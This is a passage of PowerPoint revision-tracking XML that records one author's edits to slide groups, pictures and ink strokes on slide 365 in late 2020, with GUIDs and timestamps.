creationId="{C9F6DA06-058E-4CE9-9AFF-1ADEED4514DF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5" creationId="{2DE4EFD0-84A1-4255-8AF6-23C30AC1106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6" creationId="{5250FBE4-8708-412A-BADC-DC2C231E0269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7" creationId="{81ACC52D-E734-43A8-9DA1-630C51AA5FB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8" creationId="{7CF7E650-99A3-428B-BFF6-8CB1F9D8043D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9" creationId="{22A98570-161C-47FD-972B-B28B58F545A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1" creationId="{13B5CCFE-4CB1-45A9-BE19-97717F0A0B6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2" creationId="{66FCC015-D26A-417D-A48D-48C593C5DF5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3" creationId="{33DBB594-30CC-45CF-8BFA-1F06335B2B2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4" creationId="{38719957-3BFB-4CDB-9790-9EF8EA0AC80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5" creationId="{C6A5A021-E20B-4369-98C4-FBB58A0E11D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197" creationId="{477521AE-0748-4941-846D-CB795909DA7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199" creationId="{5DCAB406-FED9-4082-AD31-8ECE662E59D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0" creationId="{420D0260-6655-4853-AB7E-63FDED26F55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3" creationId="{FFA214C0-EA8C-4B74-8B17-16ED9E702B1E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4" creationId="{EE76C72D-3E7B-4DA5-AD03-34D5F4375F07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6" creationId="{F5E5DB98-E716-4088-86A4-AD37872AFED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7" creationId="{43E1ED8D-11C7-4C74-83E8-999DD4E358D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8" creationId="{CFA6BE5F-4F9C-480D-808C-A4335872CD4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9" creationId="{A6C5CDE0-F918-4106-956A-D07492FB064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0" creationId="{CFEEA8A4-DB80-4AA0-A5A8-4FABD99F824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1" creationId="{7BE53DF5-8028-482C-B538-F90317BB63CD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2" creationId="{AD730F54-E96B-4406-A97F-2ACD9F0B3663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3" creationId="{5F02F32D-2E31-4036-9AA5-B62A1789DBB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4" creationId="{30207CAE-8C26-465B-9681-21187AC7719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5" creationId="{14C19DD0-84CE-4FB0-8B47-F3B7A72B0BD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6" creationId="{FC8ADFAE-A574-4C10-B8C7-7C6A42F682C0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7" creationId="{210A1344-904A-403A-B8BD-1E46AC31508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8" creationId="{A461DABC-CB4E-4F7A-95C1-6D24EC7C4A0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9" creationId="{675C6FFD-CA46-498D-BE74-BAA3A6DF6E8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0" creationId="{9C363D30-548A-46D0-94A1-352D230B97FA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1" creationId="{72905692-A2D3-4BC7-A66D-CB3F8AC5DD5A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2" creationId="{0CA437B7-468F-4F32-8F40-1BC513F292DF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3" creationId="{7F37F131-BADF-4810-A699-7C01364A81B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5" creationId="{EE2B64F5-21B8-4160-BDD8-F4F7A24F5EF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6" creationId="{72598D8B-A202-4A9D-8769-A288F76E9EF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7" creationId="{98560795-913B-400D-BE1D-A933B2D6F2D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9" creationId="{C70F2A99-78F0-4FE5-9124-D9C77051DBA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0" creationId="{E26584D2-A4DB-49D8-B14C-1E5606A86CE8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1" creationId="{94E6F748-95FD-4B10-92F9-7963698CBA8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2" creationId="{363848F7-4BB7-4F36-A816-F4D90B4493B1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3" creationId="{03A157FC-87A9-433C-8DFC-9CBE14BE397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4" creationId="{106C53BB-38A1-4F5E-B67C-83D488215F6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5" creationId="{057EF807-3E2C-4DB6-AA4D-81BF56DE095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6" creationId="{2E83F75C-C768-4BF3-8AF1-4FD4485FB057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7" creationId="{969A62F1-584F-4F0F-BEF6-405D25CAD7B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8" creationId="{4C87D154-FB95-4E85-9626-ED0AE0D1257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9" creationId="{FA077AF7-9B77-4599-8BEF-C24A8A2B75AD}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add del mod ord modClrScheme chgLayout">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T08:42:07.618" v="1277" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3487364617" sldId="364"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T08:41:47.973" v="1274" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3487364617" sldId="364"/>
            <ac:spMk id="20" creationId="{F45A1A35-8585-4E0F-8173-629513646F6B}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:56:00.717" v="8168"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1383557001" sldId="365"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T08:50:26.510" v="1386" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:spMk id="2" creationId="{A636C639-4E4E-4141-AF0F-7A4C0A5FEA96}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:54:42.264" v="8160" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:spMk id="142" creationId="{44585827-E702-499F-81A4-D718C85B1C88}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T20:52:51.756" v="5967" actId="1037"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365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0-24T09:02:07.822" v="1400"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:grpSpMk id="11" creationId="{75DFE070-4ED0-453D-A158-4379123626E6}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:02:23.158" v="1408"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:grpSpMk id="14" creationId="{AECB01FF-DE2E-41A8-A81C-87C84DD31A86}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:04:13.130" v="1420"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:grpSpMk id="20" creationId="{57F6E5ED-FFD1-4FA1-9916-353640905559}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:04:20.004" v="1423"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:grpSpMk id="23" creationId="{D5C03378-5CA2-4A69-A041-1C8993435412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26" creationId="{B28CCE68-BEA7-4907-9E7D-EF8CB5D4E3E4}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:07:19.966" v="1482" actId="688"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365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0-24T09:08:21.930" v="1489"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:grpSpMk id="47" creationId="{2BA5B70B-C698-45F4-9C76-AB4D89C347DC}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T20:52:05.813" v="5935" actId="478"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:grpSpMk id="48" creationId="{23BBD9AD-60D6-41CF-B6D1-7E5CA10631D9}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:06:08.822" v="1450"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:grpSpMk id="52" creationId="{4AAF4422-DEBE-49DA-AFFE-1C3020E0A221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43" creationId="{BE4D945D-A314-4612-A05A-44AAA74BDDCD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4" creationId="{A0874B14-E556-460B-AEAB-F76ED6A74C10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5" creationId="{DBDF2950-C1B7-42C3-B33B-AFDD62F171F7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9" creationId="{CB08D9F8-A467-4877-87A8-9664BF27F706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50" creationId="{C3E0263B-E8E9-4273-98ED-EA42064B4CA6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53" creationId="{B4140AB2-1CC1-4F66-A916-0CC6A4254CF5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72" creationId="{B52A3271-1BC3-49A2-B469-9706E741ABB9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76" creationId="{D95A4FE3-052F-4BB4-ABFA-B84C41AC3533}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:04:29.458" v="1429"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:grpSpMk id="1024" creationId="{FA3C251B-F600-43C5-BA93-47104400BC7C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26" creationId="{9B1D42FA-146B-4B07-A516-565CCA46E322}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:04:52.679" v="1436"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:grpSpMk id="1031" creationId="{294E26BC-1522-49D6-BF2F-46D2297E4D57}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:05:05.771" v="1441"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:grpSpMk id="1033" creationId="{860D1FA4-4877-4285-AAE8-EC5B375DCAAF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38" creationId="{372EC0FC-DC80-4021-8178-1503278097E2}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:05:49.629" v="1446" actId="1076"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:grpSpMk id="1039" creationId="{05965994-66C4-4C20-A1DB-ACC1EF70C7B7}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:06:57.723" v="1463"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:grpSpMk id="1044" creationId="{FECB6D39-38CA-4CFD-A501-F53B8B095CF5}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:07:14.421" v="1481"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:grpSpMk id="1051" creationId="{073595F2-06A0-44D5-B7C5-6E9B28AE9ACE}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:07:03.361" v="1468"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:grpSpMk id="1054" creationId="{48A4B46A-D70A-4FEE-A311-86D6B5385184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57" creationId="{1D71E30B-3602-4ABE-BEC0-057E1E762B83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67" creationId="{48219207-AE79-4894-8DB3-53596144BA3C}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:08:53.801" v="1517"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:grpSpMk id="1072" creationId="{87A747DD-FBE3-48A1-8E22-1EA0AE53C4CC}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="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074" creationId="{9C573F4E-EF79-4D61-8FC6-13F9F5B4B4F3}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="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77" creationId="{56C2C8AD-88BA-45C7-8507-D86324E476C2}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:09:10.997" v="1534"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:grpSpMk id="1080" creationId="{B415A3BA-3189-4809-A896-0E692ABBD100}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add 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91" creationId="{7B3050BB-39BC-47C1-A4D8-8ED598C88C2C}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:09:17.677" v="1545"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:grpSpMk id="1100" creationId="{DA991619-7984-42B6-8645-E69BE305CA7E}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:09:21.032" v="1549"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:grpSpMk id="1102" creationId="{CB52037C-737F-42CA-BE78-FF5C28B45BAA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05" creationId="{E3D6AB16-4D41-4673-AC88-31FC60165587}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:09:43.475" v="1570"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:grpSpMk id="1110" creationId="{740967E7-FF9D-45DD-A093-9868F10AC16B}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:09:45.231" v="1573"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:grpSpMk id="1123" creationId="{DA99421B-F9B8-475F-ACEE-7242DC3437B6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26" creationId="{ED26D49F-43F8-49F7-A3E8-F1422E92DB94}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:09:54.770" v="1590"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:grpSpMk id="1131" creationId="{EDBDA1F6-8A38-4D87-8C23-04AE77C9246E}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:09:54.188" v="1587"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:grpSpMk id="1134" creationId="{1FA6BEB0-EE5C-4A85-A948-9AF4D7A5CED7}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:09:52.909" v="1585"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:grpSpMk id="1136" creationId="{D665B486-0B36-42CC-8FF2-2A711F3FBC6B}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:10:06.579" v="1604"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:grpSpMk id="1145" creationId="{7C032AF5-6BB5-40CD-AEBA-34B556DCFBA6}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:10:28.720" v="1611" actId="165"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:grpSpMk id="1150" creationId="{913F33AC-90CC-43E9-A7FC-EB94A400BB30}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T20:52:51.756" v="5967" actId="1037"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:grpSpMk id="1151" creationId="{D186CA7A-2A92-46D2-BA6B-7E5E81E18832}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T20:52:51.756" v="5967" actId="1037"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:grpSpMk id="1152" creationId="{2DA7DEBB-69B3-4AEF-8FA2-4E1D5B9AF097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153" creationId="{C71BDADD-765D-4DED-B435-D99857DE7324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154" creationId="{9CC7B641-B3E1-4C34-9BE8-1B6E5DED0EA3}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T20:52:00.962" v="5934" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:picMk id="4" creationId="{B660A66C-670A-424A-B692-4B172D09762F}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T08:53:47.824" v="1391" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:picMk id="6" creationId="{1EA396E1-E73A-4A58-B5A0-A6DD394A7B40}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T08:55:51.774" v="1393" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:picMk id="1025" creationId="{7887453D-F00A-49C7-AB65-B10C311490E8}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:02:08.422" v="1403" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:inkMk id="7" creationId="{054CB36F-53C4-4588-9FC1-C7E115D39C92}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:02:08.262" v="1402" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:inkMk id="8" creationId="{26833B19-8240-47EE-9213-B1A4BF26FF4F}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:02:08.087" v="1401" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:inkMk id="9" creationId="{FF91FB54-E292-4B78-8E74-F29B9485FF56}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:02:07.822" v="1400"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:inkMk id="10" creationId="{8F703F9B-D278-4E27-BF1E-95DFEBE49A4C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:02:23.430" v="1409" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:inkMk id="12" creationId="{3DDD3471-054A-4918-A6E6-38F3F080B7E1}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:02:23.158" v="1408"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:inkMk id="13" creationId="{FD7453B2-DF6B-481A-9E23-7D02C1FCBBBD}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:04:04.882" v="1413" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:inkMk id="15" creationId="{79640B64-F4C3-4EF8-81AC-347D924A0C13}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:04:04.638" v="1412" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1383557001" sldId="365"/>
            <ac:inkMk id="16" creationId="{1B3877A5-614B-48C0-A617-566D4523860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7" creationId="{DC56CA86-69BB-408E-9304-8A2FC1991139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8" creationId="{2A6399F0-B1FC-47DA-AEAE-04B557BB64F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9" creationId="{AF271EFB-B98A-4429-B891-D6481BC4FBB3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1" creationId="{B5B7689E-F462-4780-A48B-9FED0B454D2C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2" creationId="{CCD3FE3B-74DB-4C9C-8768-4902DB2C2B1D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4" creationId="{2F5D8170-BB25-4784-99E0-B08FE95D71EA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5" creationId="{71879D2A-33CA-4207-9037-3B64F503DD85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7" creationId="{B949BF4A-A1F0-43A0-B1D6-406266184426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8" creationId="{31A24B5A-5094-4548-A92A-E7513F83F490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9" creationId="{F571C095-1AD3-432C-BB4B-FFF32DFCDCC3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0" creationId="{F0F132C4-58E2-48DA-8BFB-2CA8D2A0FB4E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1" creationId="{6A08AF55-95D6-4F7B-A656-39267DA1DAD8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2" creationId="{0E77CFA3-91A9-4BA8-AEAF-A4272B302CB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3" creationId="{A2819F92-C967-4A38-9151-D33B77A593F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4" creationId="{18956C52-381C-46A1-B1E1-0E59B2BFD7B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5" creationId="{92048796-4F6A-4E76-AD3B-5394C207542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6" creationId="{400B0862-C9BA-4F7D-9244-B574669363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7" creationId="{95DFD61E-EC0E-41A6-A11B-79679D702F70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8" creationId="{62702BD7-0EB2-4A27-A0BA-1ED42A4E12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9" creationId="{198A0111-0FFA-4037-9AF9-65E766BEA89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0" creationId="{E9D4367E-138B-44C7-B60A-07AC9CF17BF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1" creationId="{94633190-E9BC-439C-92EB-8799F3EA7C3E}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:08:14.062" v="1484" actId="9405"/>
          <ac:inkMkLst>
